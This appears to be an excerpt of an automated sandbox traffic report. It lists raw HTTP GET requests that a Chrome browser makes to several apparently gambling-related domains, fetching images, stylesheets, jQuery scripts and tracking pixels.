Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/gd_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/guide.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /default.html HTTP/1.1Host: wns732.ccConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: com_env=p
Source: global trafficHTTP traffic detected: GET /cc.png?r=2281974097 HTTP/1.1Host: zb-qq.gzjqwlkj.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://xpj723.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/manifest.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: js326.ccConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/pt_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/layer.js HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/zbw?r=5552162052 HTTP/1.1Host: ocsapi1961.hydqef.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/jquery/jquery.super-marquee.js HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/jquery/jquery.nicescroll.min.js HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/themes/hongbao.css HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://8vpfnx.eveday.me/ftl/commonPage/themes/gui-base.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/themes/gui-layer.css HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://8vpfnx.eveday.me/ftl/commonPage/themes/gui-base.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/vendor.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/common.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/jquery/jquery-1.11.3.min.js HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/t4091.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/sunbet_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/bbin_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/gc_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: js326.ccConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://js326.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: com_env=p
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/lebo_h.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/css/t4044.css HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=8690266696 HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/public/vendor.dll.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=9636637722 HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/lib/jquery.min-1.9.1.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/zbw?r=8092400775 HTTP/1.1Host: ocsapi1961.hydqef.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://wns732.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/guide.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/theme/default/layer.css?v=3.1.0 HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/jquery/plugins/jquery.validate/jquery.validate.js HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=1707849192 HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://wns732.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=2281974097 HTTP/1.1Host: zb-qq.gzjqwlkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/float.js HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/idangerous.swiper.min.js HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=4421600803 HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://wns732.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/cc.png?1717972856368 HTTP/1.1Host: ocsapi1961.hydqef.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://js326.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://js326.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=7992680070 HTTP/1.1Host: zb-qq.gzjqwlkj.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://wns732.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/js/gamebox/common/jquery.validate.extend.msites.js HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=wns732.cc&terminal=1&r=3425276221 HTTP/1.1Host: ahd-ocssn.qqxgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://wns732.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/manifest.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/websocket/Comet.js HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/moment.js HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/vendor.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/zbw?r=8092400775 HTTP/1.1Host: ocsapi1961.hydqef.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/css/t4045.css HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/common.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
